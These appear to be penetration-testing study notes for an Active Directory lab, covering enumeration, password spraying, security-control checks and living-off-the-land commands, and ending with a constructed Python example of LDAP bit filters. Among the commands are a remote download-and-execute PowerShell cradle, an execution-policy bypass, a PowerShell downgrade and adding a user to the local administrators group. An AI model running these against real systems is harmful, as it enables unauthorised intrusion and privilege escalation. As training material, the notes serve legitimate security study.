Check out the following links:
HTB Windows Priv Esc
Win Priv Esc Examples
Syntax for Tools
Initial Enumeration of the domain
ID users
Finding a User
Linux:
Windows:
At this point in our assessment, we would want to perform enumeration using a tool such as BloodHound to determine whether any or all of these hashes are worth cracking.
Password Spraying
Enumerating & retrieving password policies
Linux:
Can we transfer any tools to Windows to use?
Windows:
Making a user list for Password spraying
Getting list of users:
User list with full credentials:
Internal Password Spraying
Linux:
Bash one liner
Using kerbrute
Using crackmap and filtering logon failures
Validating creds with crackmapexec
Local admin password reuse (where else can we use same password)
Windows:
Enumerating Security Controls
Windows Defender:
App Locker:
An application whitelist is a list of approved software applications or executables that are allowed to be present and run on a system.
PowerShell Constrained Language Mode
Restricted = constrained
LAPS
LAPS is used to randomize and rotate local administrator passwords on Windows hosts and prevent lateral movement.
Using Find-LAPSDelegatedGroups:
Checks the rights on each computer with LAPS enabled for any groups with read access and users with "All Extended Rights".
Search for computers that have LAPS enabled and when their passwords expire.
Credentialed Enumeration
From Linux:
CrackMapExec:
SMBMap:
RPCClient:
Impacket:
PSexec.py
Psexec.py is a clone of the Sysinternals
wmiexec.py
commands are executed through WMI
Windapsearch.py
Can be used to enumerate users, groups, and computers from a Windows domain by utilizing LDAP queries.
Domain admins:
Privileged users:
Bloodhound.py
Once we have domain creds, we run BloodHound.
Credentialed Enumeration
From Windows:
AD Powershell Module
Discover modules
Load AD Module
Get Domain Info
Get-ADUser (servicePrincipalName)
Checking for trust relationships
Group Enumeration
Detailed Group info
Group Membership
Powerview
helps us gain situational awareness within an AD environment
Domain User info
Recursive Group Membership
Trust Enumeration
Testing for local admin access
Finding users with SPN set
Sharpview
Info on specific user
Snaffler
-s = print results to console, -d = domain to search, -o = write results to a log file, -v = verbosity level (data = print results to screen)
Bloodhound
Running sharphound collector
Living off the land
Env commands for host and network recon
PC name: hostname
OS version: [System.Environment]::OSVersion.Version
Patches and hotfixes applied: wmic qfe get Caption,Description,HotFixID,InstalledOn
Network adapter state and config: ipconfig /all
Domain name to which host belongs: echo %USERDOMAIN%
Prints name of the DC the host checks in with (only from cmd): echo %logonserver%
Systeminfo – covers all the above in one command
Harnessing powershell
Lists available modules loaded for use: Get-Module
Prints execution policy for each scope: Get-ExecutionPolicy -List
Set-ExecutionPolicy Bypass -Scope Process
Powershell history: Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
Key paths, users, comp info: Get-ChildItem Env: | ft Key,Value
Download file from web, and call it from memory: powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
Downgrading powershell: powershell.exe -version 2
Checking Defences
Firewall checks:
From cmd:
Comp status and configs
Am I alone check (i.e., is anyone else logged on):
Network Information
List all known hosts stored in the ARP table: arp -a
Print adapter settings for host: ipconfig /all
Routing table, identifying known networks: route print
Status of firewall: netsh advfirewall show allprofiles
Windows Management Instrumentation (WMI)
Prints patch level: wmic qfe get Caption,Description,HotFixID,InstalledOn
Display basic host info + attributes within list: wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
A list of all processes on host: wmic process list /format:list
Displays info about the domain and DC: wmic ntdomain list /format:list
Displays info about all local accounts and any domain accounts that have logged into the device: wmic useraccount list /format:list
Info about all local groups: wmic group list /format:list
Dumps info about any sys accounts that are being used as service accounts: wmic sysaccount list /format:list
Net Commands
net accounts - Information about password requirements
net accounts /domain - Password and lockout policy
net group /domain - Information about domain groups
net group "Domain Admins" /domain - List users with domain admin privileges
net group "domain computers" /domain - List of PCs connected to the domain
net group "Domain Controllers" /domain - List PC accounts of domain controllers
net group <domain_group_name> /domain - Users that belong to the group
net groups /domain - List of domain groups
net localgroup - All available groups
net localgroup administrators /domain - List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup Administrators - Information about a group (admins)
net localgroup administrators [username] /add - Add user to administrators
net share - Check current shares
net user <ACCOUNT_NAME> /domain - Get information about a user within the domain
net user /domain - List all users of the domain
net user %username% - Information about the current user
net use x: \\computer\share - Mount the share locally
net view - Get a list of computers
net view /all /domain[:domainname] - Shares on the domains
net view \\computer /ALL - List shares of a computer
net view /domain - List of PCs of the domain
Dsquery DLL
Dsquery user – user search
Dsquery computer – computer search
Dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL" – wildcard search
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl - Users With Specific Attributes Set (PASSWD_NOTREQD)
dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName – searching for domain controllers
LDAP Filtering
The userAccountControl (UAC) values 1, 2, 32, 64, 128, 512, 2048, 4096, 8192, 65536, 524288 and 1048576 are bit flags, and each means something different.
OID match strings / logical operators
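Added example (not part of the original notes, and not dsquery itself): how the bit-matching OIDs in the dsquery filters above are evaluated against userAccountControl, using constructed sample entries in place of real directory output. The flag table and the 803/804 OID semantics are as documented by Microsoft; the account names are made up.

```python
from __future__ import annotations

# userAccountControl bit flags named in the notes above (values per Microsoft docs).
UAC_FLAGS = {
    0x1: "SCRIPT", 0x2: "ACCOUNTDISABLE", 0x20: "PASSWD_NOTREQD",
    0x40: "PASSWD_CANT_CHANGE", 0x80: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x200: "NORMAL_ACCOUNT", 0x800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT", 0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD", 0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
}

# Extensible-match OIDs used in LDAP filters: 803 is bitwise AND (every asserted
# bit must be set), 804 is bitwise OR (at least one asserted bit must be set).
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"
LDAP_MATCHING_RULE_BIT_OR = "1.2.840.113556.1.4.804"

def decode_uac(value: int) -> list[str]:
    """Name every known flag set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def bit_match(rule_oid: str, attr_value: int, asserted: int) -> bool:
    """Evaluate '(attr:<rule_oid>:=<asserted>)' against one attribute value."""
    if rule_oid == LDAP_MATCHING_RULE_BIT_AND:
        return attr_value & asserted == asserted
    if rule_oid == LDAP_MATCHING_RULE_BIT_OR:
        return attr_value & asserted != 0
    raise ValueError(f"unsupported matching rule OID: {rule_oid}")

def apply_uac_filter(entries: list[dict], rule_oid: str, asserted: int) -> list[str]:
    """Return sAMAccountNames whose userAccountControl satisfies the bit rule."""
    return [e["sAMAccountName"] for e in entries
            if bit_match(rule_oid, e["userAccountControl"], asserted)]

# Constructed sample directory entries (not real accounts), standing in for dsquery output.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x200 | 0x20 | 0x10000},
    {"sAMAccountName": "old_intern", "userAccountControl": 0x200 | 0x2},
    {"sAMAccountName": "DC01$", "userAccountControl": 0x2000},
]

if __name__ == "__main__":
    # Same question as the PASSWD_NOTREQD dsquery filter above: value 32 under rule 803.
    for name in apply_uac_filter(SAMPLE_ENTRIES, LDAP_MATCHING_RULE_BIT_AND, 32):
        uac = next(e["userAccountControl"] for e in SAMPLE_ENTRIES if e["sAMAccountName"] == name)
        print(name, hex(uac), decode_uac(uac))
```

Running it lists only the constructed svc_backup account, and decoding its value shows why: PASSWD_NOTREQD is set alongside NORMAL_ACCOUNT and DONT_EXPIRE_PASSWORD, the combination an audit of service accounts would want to flag.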